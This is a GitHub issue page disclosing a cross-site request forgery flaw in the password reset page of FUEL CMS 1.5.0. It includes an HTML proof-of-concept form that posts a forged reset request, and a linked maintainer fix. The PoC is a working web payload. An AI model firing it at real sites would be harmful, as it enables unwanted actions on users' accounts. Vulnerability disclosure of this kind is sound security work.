New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

FUEL CMS 1.5.0 contains a cross-site request forgery (CSRF) vulnerability #584

Open

bunneyOps opened this issue Aug 10, 2021 · 1 comment

bunneyOps commented Aug 10, 2021

Because my mailbox function is not configured, it cannot be fully demonstrated. There is a CSRF vulnerability in the password modification page.

http://website/fuel/index.php/fuel/#/pwd_reset

csrf POC:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.255.130/fuel/index.php/fuel/#/pwd_reset" method="POST">
      <input type="hidden" name="email" value="1231&#64;1&#46;com" />
      <input type="hidden" name="Submit" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The text was updated successfully, but these errors were encountered:

daylightstudio pushed a commit that referenced this issue


          fix: for issue #584

6164cd7

BigSkidderHyPhen commented Aug 18, 2021

大师傅拿下cve了吗

# for free to join this conversation on GitHub. Already have an account? # to comment